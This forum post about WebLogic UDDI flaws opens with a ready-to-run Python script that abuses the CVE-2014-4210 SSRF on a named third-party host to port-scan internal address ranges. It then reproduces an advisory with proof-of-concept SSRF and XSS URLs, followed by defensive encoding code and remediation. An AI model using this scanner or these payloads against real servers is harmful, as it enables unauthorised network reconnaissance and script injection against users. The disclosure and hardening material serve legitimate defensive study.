WebLogic SSRF: a simple exploitation script
Posted on 2016-4-12 21:02:48 by the forum administrator
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import sys
import time
import threading
import requests


def scan(ip_str):
    ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080',
             '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000')
    for port in ports:
        exp_url = ("http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp"
                   "?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey="
                   "&txtSearchfor=&selfor=Business+location&btnSubmit=Search" % (ip_str, port))
        try:
            response = requests.get(exp_url, timeout=15, verify=False)
            # SSRF check: the SOAP exception means the server tried to reach the target
            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException', response.text)
            # connection lost: the port could not be connected to
            re_sult2 = re.findall('but could not connect', response.text)
            if len(re_sult1) != 0 and len(re_sult2) == 0:
                print(ip_str + ':' + port)
        except Exception:
            pass


def find_ip(ip_prefix):
    '''
    Given a prefix such as 192.168.1, scan every address in that /24
    '''
    for i in range(1, 256):
        ip = '%s.%s' % (ip_prefix, i)
        threading.Thread(target=scan, args=(ip,)).start()
        time.sleep(3)


if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)
    ip_prefix = '.'.join(args.split('.')[:-1])
    find_ip(ip_prefix)
```

The results obtained:

XSS is also possible, not just SSRF:

# WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
# refer: http://blog.csdn.net/cnbird2008/article/details/45080055

http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html


Universal Description Discovery and Integration (UDDI) functionality often lurks unlinked but externally accessible on WebLogic servers. It’s trivially discoverable using fuzz lists such as Weblogic.fuzz.txt and was, until recently, vulnerable to Cross Site Scripting (XSS) and Server Side Request Forgery (SSRF). I reported these vulnerabilities to Oracle and they were patched in the July 2014 Critical Patch Update (CPU).

CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6

Oracle WebLogic web server is often both (a) externally accessible; and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the WebLogic web server to connect to an arbitrary TCP port of an arbitrary host. Responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.

Below is an example request to an internal host which is not listening on TCP port 23:


https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search


Response snippet:


weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused


Below is an example request to a host which is listening on TCP port 22:

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search


Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.


It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.

SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).

CVE-2014-4241 - Reflected Cross Site Scripting in SetupUDDIExplorer.jsp

Affected software: Oracle Fusion Middleware 10.0.2, 10.3.6

User input is reflected into a cookie value (which is set for a year!). This value is then written into subsequent responses in an unsafe manner, exposing users to Cross Site scripting attacks.
This unusual vector circumvents current in-browser anti-XSS controls present in Internet Explorer and Chrome browsers. The vulnerability was present in registration.paypal.com, payflowlink.paypal.com and partnermanager.paypal.com; all were swiftly fixed after I reported this to the PayPal security team.



Reflected XSS in registration.paypal.com
Example Malicious URL:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

The response sets the privateregistry parameter value previously supplied as a cookie, and redirects the browser back to the SetupUDDIExplorer.jsp page:


HTTP/1.1 302 Moved Temporarily
Location: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp
Set-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMT
Content-Length: 331
Content-Type: text/html;charset=UTF-8


Redirected Request:


GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1
Host: [vulnerablehost]
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener; consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73; cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;


Response Snippet (showing the privateinquiryurls cookie value reflected in an unsafe manner in the response):


<td valign=top width=1%></td><td valign=top width=70%>  <p>  <h2>Private Registry:</h2>  <h3>Search URL: <b><script>alert(1)</script></b></h3>  <H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3>  </p>


Example Proof of Concept URLs:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2</script>&setPrivateRegistryPublish=Set+Publish+URL

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL


CVE-2014-4242 - Reflected Cross Site Scripting in consolejndi.portal

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6, 12.1.1, 12.1.2.0.0

I’ve also identified two reflected XSS vulnerabilities in WebLogic’s console application. The console application is intended to manage the WebLogic application server and is not normally externally exposed; as a result, exploitation of this vulnerability would be targeted at admin users.

Example Proof of Concept URL #1 (victim must be authenticated to the administrative console):


http://[vulnerablehost]:7001/console/consolejndi.portal?_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")


Response Snippet:

<div class="contenttable"><div class="introText"><p>Listing of entries found in context <script>alert(1)</script>:</p></div>


Example Proof of Concept URL #2 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//


Response Snippet:

<script type="text/javascript">document.write('<div class="JSTree">');setBaseDirectory('/console/utils/JStree/images/');setTaxonomyDelimeter('.');{_a = new TreeNode('server', null, 'myserver\u0027);alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);
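The two XSS findings above are the same defect in two output contexts: SetupUDDIExplorer.jsp writes a cookie value straight into HTML, and consolejndi.portal writes the server parameter into a JavaScript string literal, escaping the quote in one TreeNode argument but not in the URL argument. The example below is added for this page and is not code from the forum post, the GDS Security write-up or WebLogic itself; it rebuilds both reflection points in Python as a vulnerable and a hardened form, using the payload shapes shown on the page and a constructed publish URL (registry.example.net). Validating the registry URL before it is stored in the cookie matters because, as the write-up notes, a payload that arrives via a cookie set a year earlier is not something a browser's reflected-XSS filter can correlate with the current request.

```python
import html
import json
from urllib.parse import urlparse, quote

# Constructed payloads following the shapes shown on the page; no real hosts involved.
PAYLOAD_HTML = "<script>alert(2)</script>"      # SetupUDDIExplorer.jsp privateregistry value
PAYLOAD_JS = "myserver');alert(1)//"           # consolejndi.portal server value
PUBLISH_URL = "http://registry.example.net:8080/uddi/uddilistener"   # constructed stand-in

JNDI_URL = "/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server="


def is_valid_registry_url(value):
    """Input validation for a registry URL before it is stored in a cookie: only absolute
    http(s) URLs with a host, and none of the characters that cannot legally appear in a
    cookie value or that have meaning in HTML."""
    try:
        parsed = urlparse(value)
    except ValueError:
        return False
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    return not any(c in value for c in ';," \t\r\n<>')


def render_private_registry_vulnerable(search_url, publish_url):
    # Same pattern as the SetupUDDIExplorer.jsp response on the page: cookie values
    # concatenated directly into the HTML body.
    return ('<h2>Private Registry:</h2><h3>Search URL: <b>%s</b></h3>'
            '<H3>Publish URL: <b>%s</b></h3>' % (search_url, publish_url))


def render_private_registry_safe(search_url, publish_url):
    # HTML-context output encoding at the point of output, regardless of whether the value
    # came from the query string or from a cookie.
    return ('<h2>Private Registry:</h2><h3>Search URL: <b>%s</b></h3>'
            '<H3>Publish URL: <b>%s</b></h3>'
            % (html.escape(search_url, quote=True), html.escape(publish_url, quote=True)))


def js_string_literal(value):
    """JavaScript-string-context encoding for values written inside a <script> block.
    json.dumps yields a double-quoted literal with backslash, double quote, control and
    non-ASCII characters escaped; the extra replacements also neutralise the single quote
    (in case a template uses single-quoted strings) and the characters that could close
    the enclosing <script> element."""
    encoded = json.dumps(value)
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        encoded = encoded.replace(ch, esc)
    return encoded


def render_tree_node_vulnerable(server):
    # Reproduces what the consolejndi.portal response on the page shows: the server name is
    # escaped (' -> \u0027) in one TreeNode argument but concatenated unescaped into the URL argument.
    return "_a = new TreeNode('server', null, '%s', '%s');" % (
        server.replace("'", "\\u0027"), JNDI_URL + server)


def render_tree_node_safe(server):
    # The URL argument is percent-encoded first (URL context) and then, like the name argument,
    # encoded for the JavaScript string context in which it is emitted.
    return "_a = new TreeNode(%s, null, %s, %s);" % (
        js_string_literal("server"),
        js_string_literal(server),
        js_string_literal(JNDI_URL + quote(server, safe="")))


if __name__ == "__main__":
    print(render_private_registry_vulnerable(PAYLOAD_HTML, PUBLISH_URL))
    print(render_private_registry_safe(PAYLOAD_HTML, PUBLISH_URL))
    print(render_tree_node_vulnerable(PAYLOAD_JS))
    print(render_tree_node_safe(PAYLOAD_JS))
```

The point of the two safe renderers is that the encoding is chosen by where the value lands, not by where it came from: the same server name needs URL encoding inside the href-style argument and JavaScript string encoding around it, and escaping only the quote in one of the two places, as the original response does, leaves the other one open.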



Remediation

Remove access to UDDI functionality, unless there is business case to support exposing it. Failing that, ensure that the July 2014 CPU has been applied.

Disclosure Timeline
01/12/2013 - Vulnerability Reported
07/16/2014 - Vulnerability Patch Released in Oracle Critical Patch Update (CPU)
